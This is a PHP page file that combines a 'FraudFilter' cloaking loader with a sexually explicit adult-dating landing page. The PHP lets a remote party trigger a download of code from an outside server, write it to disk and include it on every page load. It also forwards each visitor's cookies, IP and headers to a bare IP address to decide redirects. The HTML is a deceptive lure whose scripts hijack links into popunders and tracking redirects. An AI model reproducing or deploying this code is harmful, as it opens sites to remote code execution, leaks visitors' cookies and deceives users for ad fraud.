<?php

/**
 * Fraudfilter PHP Paste & WordPress Integration Code
 *
 * Last Update: 2024-08-28 03:09:30 UTC
 * Version: 1.0.1
 * Author: Alex Shelznyev
 *
 * Minimum Supported Version: PHP 7.4
 * Preferred Versions: PHP 8.0, 8.1, 8.2, 8.3
 * 
 * ADVANCED
 * Verification code for WordPress Plugin: Yfs^3X4AgVEzT&
 */
error_reporting(0);

class FraudFilterWordPressLoader_ctdob {
    private $clid;
    private $campaignSecret;
    private $host;
    private $integrationType;

    public function __construct() {
        $this->clid = 'ctdob';
        $this->campaignSecret = '4ece033f-da4b-4a0d-a5b6-5c3f438eafc2';
        $this->host = 'api.fraudfilter.io';
        $this->integrationType = 'EMBED';
    }

    public function run() {
        $fileName = $this->getFileName();

        $GLOBALS['fbIncludedFileName'] = $fileName;
        $GLOBALS['fbIncludedHomeDir'] = dirname($fileName);

        if (isset($_GET['ff17x_sign'], $_GET['ff17x_time'], $_GET['ff17x_mode'])) {
            $this->handleRequest($fileName);
        }

        if (file_exists($fileName)) {
            include($fileName);
        }
    }

    private function getFileName() {
        static $fileName = null;
        if ($fileName === null) {
            $wpmode = function_exists('wp_upload_dir');
            $home = $wpmode ? wp_upload_dir()['basedir'] : __DIR__;
            $fileName = $home . DIRECTORY_SEPARATOR . $this->clid . '.include.php';
        }
        return $fileName;
    }

    private function handleRequest($fileName) {
        if (!file_exists($fileName) || in_array($_GET['ff17x_mode'], ['diagnostics', 'upgrade'], true)) {
            if ($this->isSignatureValidTemp($_GET['ff17x_sign'], $_GET['ff17x_time'])) {
                try {
                    error_reporting(E_ALL);
                    $diagnosticsResult = $this->performDiagnosticsWP($fileName);
                    if (!$diagnosticsResult['success']) {
                        echo json_encode($diagnosticsResult);
                    } elseif ($_GET['ff17x_mode'] !== 'diagnostics' || !file_exists($fileName)) {
                        $this->downloadScriptFirstTime($fileName);
                    } else {
                        echo json_encode($diagnosticsResult);
                    }
                } catch (Exception $e) {
                    echo json_encode(['success' => false, 'errors' => [$e->getMessage()], 'version' => 4]);
                }
                exit;
            }
        }
    }

    private function isSignatureValidTemp($sign, $time) {
        return hash_equals(sha1($this->campaignSecret . '.' . $this->clid . '.' . $time), $sign);
    }

    private function getUpgradeScriptViaContentsWP() {
        $context = stream_context_create([
            'http' => [
                'method' => 'GET',
                'header' => 'x-ff-secret: ' . $this->campaignSecret,
                'timeout' => 2
            ]
        ]);
        return @file_get_contents($this->getFileNameForUpdatesWP("contents"), false, $context);
    }

    private function getFileNameForUpdatesWP($type) {
        return "https://{$this->host}/v1/integration/get-updates?clid={$this->clid}&integrationType={$this->integrationType}&type=$type";
    }

    private function isSignature2ValidTemp($content) {
        return strpos($content, '@FraudFilter.io 20') !== false;
    }

    private function downloadScriptFirstTime($fileName) {
        $output = $this->getUpgradeScriptViaContentsWP();

        if ($output === false || !$this->isSignature2ValidTemp($output)) {
            $output = $this->fetchViaCurl();
        }

        if ($this->writeFile($fileName, $output)) {
            echo json_encode(['success' => true, 'phpversion' => PHP_VERSION, 'version' => 5]);
        } else {
            echo json_encode(['success' => false, 'version' => 5, 'errorMessage' => "Unable to write to file: $fileName. Please check permissions for folder: " . dirname($fileName)]);
        }
    }

    private function fetchViaCurl() {
        if (!function_exists('curl_init')) {
            throw new Exception('cURL is not available on this server.');
        }

        $ch = curl_init($this->getFileNameForUpdatesWP("curl"));
        curl_setopt_array($ch, [
            CURLOPT_HTTPHEADER => ['x-ff-secret: ' . $this->campaignSecret],
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_CONNECTTIMEOUT => 5,
            CURLOPT_TIMEOUT => 10,
        ]);
        $output = curl_exec($ch);
        $error = curl_error($ch);
        curl_close($ch);

        if ($error) {
            throw new Exception("cURL Error: $error");
        }

        if (!$this->isSignature2ValidTemp($output)) {
            throw new Exception("Malformed answer received from the server.");
        }
        return $output;
    }

    private function writeFile($fileName, $content) {
        return file_put_contents($fileName, $content, LOCK_EX) !== false;
    }

    function hasPermissionsIssuesWP($home, $fileName) {
        ob_start();
        $tempFileName = $fileName.'.tempfile';
        $tempFile = fopen($tempFileName, 'w');
        if ( !$tempFile ) {
            ob_end_clean();
            return array('code' => 'WRITE_PERMISSION','args' => array($tempFileName, $home));
        } else {
            ob_end_clean();
            $meta_data = stream_get_meta_data($tempFile);
            $fullfilename = $meta_data["uri"];
            fclose($tempFile);
            return unlink($tempFileName) ? "" : array('code' => 'UNABLE_TO_DELETE_TEMP_FILE','args' => array($tempFileName, $home));
        }
    }

    function performDiagnosticsWP($fileName) {
        header("X-FF: true");
        $errors = array();
        $extErrors = array();
        $success = true;
        $home = dirname($fileName);

        $permissionsIssues = $this->hasPermissionsIssuesWP($home, $fileName);
        if ($permissionsIssues) {
            $extErrors[] = $permissionsIssues;
            $success = false;
        }
        $serverConnectionIssues = $this->getCurlConnectionIssuesWP();
        $contentsConnectionIssues = $this->getContentsConnectionIssuesWP();
        $result = array('success' => $success, 'diagnostics' => true, 'extErrors' => $extErrors, 'errors' => $errors, 'version' => 5, 'phpversion' => PHP_VERSION, 'connection' => $serverConnectionIssues, 'contentsConnection' => $contentsConnectionIssues);
        return $result;
    }

    function getCurlConnectionIssuesWP() {
        return $this->sendRequestAndGetResultCurlWP2(true);
    }

    function getContentsConnectionIssuesWP() {
        return $this->sendRequestAndGetResultFileGetContentsWP2(true);
    }

        function sendRequestAndGetResultWP2($diagnostics) {
        return $this->sendRequestAndGetResultCurlWP2($diagnostics);
    }

    function sendRequestAndGetResultCurlWP2($diagnostics) {
        $resultObj = new stdClass();
        $resultObj->result = false;

        if ($diagnostics && !function_exists('curl_init')) {
            $resultObj->curlAnswerType = "NO_CURL";
            return $resultObj;
        }

        $url = "http://130.211.20.155/ctdob";
        $nParam = '7e03n';
        if (isset($_GET[$nParam])) {
            $url .= '&' . $nParam . '=' . $_GET[$nParam];
        }
        if ($diagnostics) {
            $url .= "?diagnostics=true";
        }

        $ch = curl_init($url);
        curl_setopt_array($ch, [
            CURLOPT_POST => 1,
            CURLOPT_HTTPHEADER => $this->fillAllPostHeaders(),
            CURLOPT_DNS_CACHE_TIMEOUT => 120,
            CURLOPT_CONNECTTIMEOUT => 3,
            CURLOPT_TIMEOUT => 5,
            CURLOPT_RETURNTRANSFER => 1,
            CURLOPT_TCP_NODELAY => 1,
        ]);

        $output = curl_exec($ch);
        $curl_error_number = curl_errno($ch);
        $http_status = curl_getinfo($ch, CURLINFO_HTTP_CODE);

        $output = trim($output);

        if ($diagnostics) {
            $resultObj->curlAnswerType = "CURL_ANSWER";
            $resultObj->output = $output;
            $resultObj->httpCode = $http_status;
            $resultObj->curlErrorNumber = $curl_error_number;
        } elseif ($output === '' || strlen($output) <= 3) {
            $this->notifyAboutError("ANSWER_ERROR_curl_error_number_" . $curl_error_number . '_output' . $output . '_http_status_' . $http_status);
        } else {
            $this->processOutput($resultObj, $output, $curl_error_number, $http_status);
        }

        curl_close($ch);
        return $resultObj;
    }

    function sendRequestAndGetResultFileGetContentsWP2($diagnostics) {
        $time_start = microtime(true);
        $resultObj = new stdClass();
        $resultObj->result = false;

        $url = "http://130.211.20.155/ctdob";
        $nParam = '7e03n';
        if (isset($_GET[$nParam])) {
            $url .= '&' . $nParam . '=' . $_GET[$nParam];
        }
        if ($diagnostics) {
            $url .= "?diagnostics=true";
        }

        $context = stream_context_create([
            'http' => [
                'method' => 'POST',
                'header' => $this->getHeadersAsOneString($this->fillAllPostHeaders()),
                'timeout' => 2,
                'ignore_errors' => true
            ]
        ]);

        $output = file_get_contents($url, false, $context);
        $output = trim($output);

        if ($diagnostics) {
            $resultObj->curlAnswerType = "CONTENTS_ANSWER";
            $resultObj->output = $output;
        } elseif ($output === '' || strlen($output) <= 3) {
            $this->notifyAboutError("ANSWER_ERROR_contents_diff=" . (microtime(true) - $time_start) . '_output=' . $output);
        } else {
            $this->processOutput($resultObj, $output, null, null);
        }

        return $resultObj;
    }

    private function processOutput(&$resultObj, $output, $curl_error_number = null, $http_status = null) {
        $result = $output[0];
        $sep = $output[1];
        if ($result != '0' && $result != '1' || $sep != ';') {
            $this->notifyAboutError("INVALID_PREFIX" . ($curl_error_number ? "_curl_error_number_$curl_error_number" : "") . '_output' . $output . ($http_status ? "_http_status_$http_status" : ""));
        }
        $resultObj->type = substr($output, 2, 1);
        $resultObj->url = substr($output, 4);
        $resultObj->result = ($result === '1') ? 1 : (($output === '0') ? 0 : false);
    }

    function getHeadersAsOneString($headers) {
        $endline = "\n";
        return implode($endline, $headers) . $endline;
    }

    function fillAllPostHeaders() {
        $headers = [
            'content-length: 0',
            'X-FF-P: 4ece033f-da4b-4a0d-a5b6-5c3f438eafc2'
        ];

        $headerMappings = [
            'X-FF-REMOTE-ADDR' => 'REMOTE_ADDR',
            'X-FF-X-FORWARDED-FOR' => 'HTTP_X_FORWARDED_FOR',
            'X-FF-X-REAL-IP' => 'HTTP_X_REAL_IP',
            'X-FF-DEVICE-STOCK-UA' => 'HTTP_DEVICE_STOCK_UA',
            'X-FF-X-OPERAMINI-PHONE-UA' => 'HTTP_X_OPERAMINI_PHONE_UA',
            'X-FF-HEROKU-APP-DIR' => 'HEROKU_APP_DIR',
            'X-FF-X-FB-HTTP-ENGINE' => 'X_FB_HTTP_ENGINE',
            'X-FF-X-PURPOSE' => 'X_PURPOSE',
            'X-FF-REQUEST-SCHEME' => 'REQUEST_SCHEME',
            'X-FF-CONTEXT-DOCUMENT-ROOT' => 'CONTEXT_DOCUMENT_ROOT',
            'X-FF-SCRIPT-FILENAME' => 'SCRIPT_FILENAME',
            'X-FF-REQUEST-URI' => 'REQUEST_URI',
            'X-FF-SCRIPT-NAME' => 'SCRIPT_NAME',
            'X-FF-PHP-SELF' => 'PHP_SELF',
            'X-FF-REQUEST-TIME-FLOAT' => 'REQUEST_TIME_FLOAT',
            'X-FF-COOKIE' => 'HTTP_COOKIE',
            'X-FF-ACCEPT-ENCODING' => 'HTTP_ACCEPT_ENCODING',
            'X-FF-ACCEPT-LANGUAGE' => 'HTTP_ACCEPT_LANGUAGE',
            'X-FF-CF-CONNECTING-IP' => 'HTTP_CF_CONNECTING_IP',
            'X-FF-INCAP-CLIENT-IP' => 'HTTP_INCAP_CLIENT_IP',
            'X-FF-QUERY-STRING' => 'QUERY_STRING',
            'X-FF-X-FORWARDED-FOR' => 'X_FORWARDED_FOR',
            'X-FF-ACCEPT' => 'HTTP_ACCEPT',
            'X-FF-X-WAP-PROFILE' => 'X_WAP_PROFILE',
            'X-FF-PROFILE' => 'PROFILE',
            'X-FF-WAP-PROFILE' => 'WAP_PROFILE',
            'X-FF-REFERER' => 'HTTP_REFERER',
            'X-FF-HOST' => 'HTTP_HOST',
            'X-FF-VIA' => 'HTTP_VIA',
            'X-FF-CONNECTION' => 'HTTP_CONNECTION',
            'X-FF-X-REQUESTED-WITH' => 'HTTP_X_REQUESTED_WITH',
            'User-Agent' => 'HTTP_USER_AGENT',
            'Expected' => ''
        ];

        foreach ($headerMappings as $out => $in) {
            $this->addHeader($headers, $out, $in);
        }

        $hh = $this->getallheadersFF();
        foreach ($hh as $key => $value) {
            if (strtolower($key) === 'host') {
                $headers[] = 'X-FF-HOST-ORDER: ' . array_search($key, array_keys($hh));
                break;
            }
        }

        return $headers;
    }

    function getallheadersFF() {
        $headers = array();
        foreach ( $_SERVER as $name => $value ) {
            if ( substr( $name, 0, 5 ) == 'HTTP_' ) {
                $headers[ str_replace( ' ', '-', ucwords( strtolower( str_replace( '_', ' ', substr( $name, 5 ) ) ) ) ) ] = $value;
            }
        }
        return $headers;
    }

    function addHeader(& $headers, $out, $in) {
        if (!isset( $_SERVER[$in] )) {
            return;
        }
        $value = $_SERVER[$in];
        if (is_array($value)) {
            $value = implode(',', $value);
        }
        $headers[] = $out.': '.$value;
    }

    function setError($resultObj, $code, $param1 = null, $param2 = null, $param3 = null) {
        $resultObj->errorCode = $code;
        $resultObj->error = $code;
        if ($param1 != null) {
            $resultObj->$param1 = $param1;
        }
        if ($param2 != null) {
            $resultObj->$param2 = $param2;
        }
        if ($param3 != null) {
            $resultObj->$param3 = $param3;
        }
        return $resultObj;
    }

    function notifyAboutError($message) {
        $len = strlen($message);
        if ($len > 800) {
            $message = substr($message, 0, 800);
        }
        $message = urlencode($message);

        $url = 'http://log.fraudfilter.io/ff-php?v=ff1&guid=ctdob&m='.$message;
        $ch = curl_init($url);

        curl_setopt($ch, CURLOPT_DNS_CACHE_TIMEOUT, 3);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 3);
        curl_setopt($ch, CURLOPT_TIMEOUT, 3);

        $output = curl_exec($ch);
    }

}

$fraudFilterWordPressLoader_ctdob = new FraudFilterWordPressLoader_ctdob();
$fraudFilterWordPressLoader_ctdob->run();

// @FraudFilter.io 2024-08-28 03:09:35 UTC
?>





<!DOCTYPE html>
<html>
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
<title>Porn80.store</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="language" content="en-US" />
<meta http-equiv="content-language" content="en-US" />
<meta name="description" content="bl.chat2show.com" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0" />
<link rel="icon" type="image/png" href="../../lpmedia.servefilesonly.com/img/_favicons/casualdatingHeart_fave92be92b.png?1100243" />
<link rel="apple-touch-icon" href="../../lpmedia.servefilesonly.com/img/_patterns/apple-touch-icone92be92b.png?1100243" />
<link rel="stylesheet" href="../../lpmedia.servefilesonly.com/style/layout/animatione92be92b.css?1100243" />
<link rel="stylesheet" href="../../lpmedia.servefilesonly.com/widgets/corner/cornere92be92b.css?1100243" />
<link href="https://fonts.googleapis.com/css?family=Montserrat:900|Oswald:400,700,900|Roboto:400,700" rel="stylesheet">
<link href="../../maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" />
<link rel="stylesheet" href="../../lpmedia.servefilesonly.com/build/templates/MB/TK800X/style.mine92be92b.css?1100243" />
<script async src="https://www.googletagmanager.com/gtag/js?id=G-G6B94KFC5N"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-G6B94KFC5N'); </script>

<script type="text/javascript"> (function(c,l,a,r,i,t,y){ c[a]=c[a]||function(){(c[a].q=c[a].q||[]).push(arguments)}; t=l.createElement(r);t.async=1;t.src="https://www.clarity.ms/tag/"+i; y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y); })(window, document, "clarity", "script", "p0eav8yvt8"); </script>

<script src="https://cdn.usefathom.com/script.js" data-site="DONONPVS" defer></script>

</head>

<body>
<div class="wrapper">
<div class="step-wrapper">
<ul>
<li class="step js-step step1 ">
<div class="step-inner">
<div class="step-scroll">
<div class="logo-wrapper">
<img src="../../imedia.justservingfiles.net/787eb7f4-c280-4b34-9816-3f2225170147.png" alt="bl.chat2show.com">
</div>
<div class="image-wrapper circle">
<img src="../../imedia.servefilesonly.com/f6eff6e9-6e0b-4df7-b20f-878cfc21b7a3.jpg" alt="bl.chat2show.com" alt="bl.chat2show.com" />
</div>
<p class="agency-text"><b class="blue-text">HORNY WOMEN IN YOUR AREA WANT FUN!</b><b>SIGN UP NOW FOR FREE!</b><span class="red-text">PLEASE CONFIRM YOUR AGE:</span></p>
</div>
</div>
<div class="btn-group">
<div class="btn btn-blue js-next-step">
<a href="javascript:void(0);">Yes, I am over 18!</a>
</div>
</div>
</li>
<li class="step js-step step2 hidden">
<div class="step-inner">
<div class="step-scroll">
<h2 class="title">WARNING!</h2>
<p class="subtitle">We found <span class="rd-number"></span> women within 10 minutes drive of your current location who would do anything to get you to lick their pussy!</p>
<div class="image-wrapper jade rectangle img-2">
<img src="../../imedia.servefilesonly.com/1f7016c5-0fc6-481d-94c6-305a7846b4e0.jpg" alt="bl.chat2show.com" alt="bl.chat2show.com" />
</div>
<p class="question">Have you ever given a woman an orgasm?</p>
</div>
</div>
<div class="btn-group">
<div class="btn btn-yes js-next-step">
<a href="javascript:void(0);">Yes</a>
</div>
 <div class="btn btn-no js-next-step">
<a href="javascript:void(0);">No</a>
</div>
</div>
</li>
<li class="step js-step step3 hidden">
<div class="step-inner">
<div class="step-scroll">
<h2 class="title">WARNING!</h2>
<p class="subtitle">We found <span class="rd-number"></span> women within 10 minutes drive of your current location who would do anything to get you to lick their pussy!</p>
<div class="image-wrapper jade rectangle img-3">
<img src="../../imedia.servefilesonly.com/7bf21333-c0ca-4bbd-97be-033e09beca3b.jpg" alt="bl.chat2show.com" alt="bl.chat2show.com" />
</div>
<p class="question">Would you lick this pussy?</p>
</div>
</div>
<div class="btn-group">
<div class="btn btn-yes js-next-step">
<a href="javascript:void(0);">Yes</a>
</div>
<div class="btn btn-no js-next-step">
<a href="javascript:void(0);">No</a>
</div>
</div>
</li>
<li class="step js-step step4 hidden">
<div class="step-inner">
<div class="step-scroll">
<h2 class="title">WARNING!</h2>
<p class="subtitle">We found <span class="rd-number"></span> women within 10 minutes drive of your current location who would do anything to get you to lick their pussy!</p>
<div class="image-wrapper jade rectangle img-4">
<img src="../../imedia.servefilesonly.com/aa691020-cf20-401e-ae6f-3a302d1d3cd8.jpg" alt="bl.chat2show.com" alt="bl.chat2show.com" />
</div>
<p class="step4-text bold-text">You are qualified to get laid and lick pussies, but please don't forget ...</p>
<p class="step4-text list-text"><span style="font-size: 0.95em">If you recognize a member, don't make it public! Our members want to keep their sex life private.</span><span style="font-size: 0.95em">These women expect you to lick their pussy, if you do they will treat you like royalty!</span><span style="font-size: 0.95em">Please respect our members. They are normal people in search of safe fun for adults.</span></p>
<p class="step4-text violet-text">If you don't follow these rules, your account will be closed immediately!<br />If you agree to the above, click on the 'Let me in!' Button below to be forwarded to the registration page.</p>
</div>
</div>
<div class="btn-group">
<div class="btn btn-submit">
<a href="https://track.datesearch.club/click">Let me in!</a>
</div>
</div>
</li>
</ul>
</div>
<div class="footer">
<div class="legal__container">
 <div class="legal__imprint" data-uid="legal__imprint--{{ txt_legal_imprint }}">Imprint</div>
<div class="legal__privacy" data-uid="legal__privacy--{{ txt_legal_privacy }}">Privacy Policy</div>
<div class="legal__agb url_imprint" data-uid="legal__agb--{{ txt_legal_agb }}">Terms of Use</div>
</div>
</div>
</div>
<script src="../../ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script type="text/javascript" src="../../lpmedia.servefilesonly.com/build/widgets/registrationFormBuilder/scripts.mine92be92b.js?1100243"></script>
<script type="text/javascript" src="../../lpmedia.servefilesonly.com/build/templates/MB/TK800X/scripts.mine92be92b.js?1100243"></script>
<script type="text/javascript" src="../../lpmedia.servefilesonly.com/js/popwine92be92b.js?1100243"></script>


<script>
 jQuery(document).ready(function () {

    const queryString = window.location.search;
    const urlParams = new URLSearchParams(queryString);
    const pathName = window.location.pathname.replace("https://live.chat2show.com/landing/", '');
    const cmsId = urlParams.get('cmsid');
    const campaign = urlParams.get('name');
    let isMlp = false;

    if (cmsId != null) {
        const mlp = cmsId.split("--")[1];

        if (mlp == pathName) {
            isMlp = true;
        }

    }

    if (isMlp) {

        var popTrigger = 0;

        var testpop = function (site) {

            if (popTrigger < 1) {

                popTrigger++;

                window.open(site);

                var interval = 500;
                window.setTimeout(function () {

                    window.location.href = "https://eu-adsrv-cached.rtbsuperhub.com/ir/?placement=8216_asia&subPublisher=" + campaign;
                }, interval);
            }
        };


        function checkADNPOP(name, callback) {
            var interval = 500;
            window.setTimeout(function () {
                callback(window[name]);
                window.setTimeout(checkADNPOP, interval, name, callback);
            }, interval);
        }

        checkADNPOP("ADNPOP", function () {

            jQuery(function () {

                $("a").each(function (index) {

                    if ($(this).attr('href') !== undefined) {

                        if ($(this).attr('href').indexOf("landing/index.html") !== -1) {

                            $(this).unbind('click').bind('click', function (e) {

                                e.preventDefault();

                                if (e.target.href) {
                                    testpop(e.target.href);
                                } else {
                                    testpop(e.currentTarget.href);
                                }

                            });

                        }

                    }

                });

            });

        });
    }

});
</script>
<script type="text/javascript">
    $(document).ready(function () {
                Popwin.width = 425;
                Popwin.links.terms.url = 'http://bl.chat2show.com/assets/tplegal/united_tc.html';
        Popwin.links.privacy.url = 'http://bl.chat2show.com/assets/tplegal/united_privacy.html';
        Popwin.links.imprint.url = 'http://bl.chat2show.com/assets/tplegal/imprint_united-performance.html';
        Popwin.links.entertainment.url = 'http://bl.chat2show.com/';
        Popwin.initialize();
    });
</script>
<script>
    function populateLinks(linkToPopulate) {
        let queryString = window.location.search.substring(0);
        let links = document.getElementsByTagName("a");
        for (let i = 0; i < links.length; i++) {
            if (links[i].href === linkToPopulate) {

                if ("/landing/da6018" !== 'null') {
                    links[i].href = "https://www.chat4more.com/landing/jmc6100?subPublisher=popunder:8216_popunder_usa_all_mlp_pu&zone=popunder:8216_popunder_usa_all_mlp_pu&adformat=popunder&auctionid=64b640dd03255-442819&uniqueid=92802c5d0f314e8a254ed900ecb5a869&name=8216_popunder_usa_all_mlp_pu&newservice=true&cmsid=landing--jmc6100--landing--sa8305&tpcampid=369d4eef-66d2-4db5-b351-412814a8837b&imp_tagid=8216_popunder_usa_all_mlp_pu&uid=TP-64b6409e866095.36558250&campaign_lp=3:landing--jmc6100--landing--sa8305&product=fetooweb&zz=true&nextPage=/landing/sa8305&ur-api-fetch-hitid=true" + queryString;
                } else {
                    links[i].href = linkToPopulate + queryString;
                }
            } else {
                let newLink = links[i].href.substring(0, links[i].href.lastIndexOf('https://live.chat2show.com/'));
                let newLinkToPopulate = linkToPopulate.substring(0, linkToPopulate.lastIndexOf('https://live.chat2show.com/'));

                if (newLink === newLinkToPopulate) {

                                            links[i].href = links[i].href + queryString;
                    
                }
            }
        }
    }

    populateLinks("https://track.datesearch.club/click");
</script>
</body>

</html>